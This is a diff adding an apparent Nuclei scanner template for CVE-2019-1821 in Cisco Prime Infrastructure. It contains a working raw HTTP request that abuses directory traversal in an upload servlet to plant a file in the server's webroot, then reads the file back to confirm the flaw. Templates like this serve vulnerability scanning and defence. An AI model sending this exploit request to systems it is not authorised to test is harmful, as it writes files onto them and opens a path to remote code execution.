Create CVE-2019-1821.yaml

cves/2019/CVE-2019-1821.yaml

@@ -0,0 +1,50 @@
+id: CVE-2019-1821
+
+info:
+  name: Cisco prime infrastructure unauthorized RCE (CVE-2019-1821)
+  author: _0xf4n9x_
+  severity: high
+  description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability.
+  reference:
+    - https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-1821
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1821
+  tags: rce,fileupload,unauth,cve,cve2019
+
+requests:
+  - raw:
+      - |
+        POST /servlet/UploadServlet HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Primary-IP: 127.0.0.1
+        Filename: test.tar
+        Filesize: 10240
+        Compressed-Archive: false
+        Destination-Dir: tftpRoot
+        Filecount: 1
+        Content-Length: 269
+        Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83
+
+        --871a4a346a547cf05cb83f57b9ebcb83
+        Content-Disposition: form-data; name="files"; filename="test.tar"
+
+        ../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar  00000000000000{{randstr}}
+        --871a4a346a547cf05cb83f57b9ebcb83--
+
+      - |
+        GET /test.txt HTTP/1.1
+        Host: {{Host}}
+        Connection: close
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code==200"
+          - "contains((body_2), '{{randstr}}')"
+        condition: and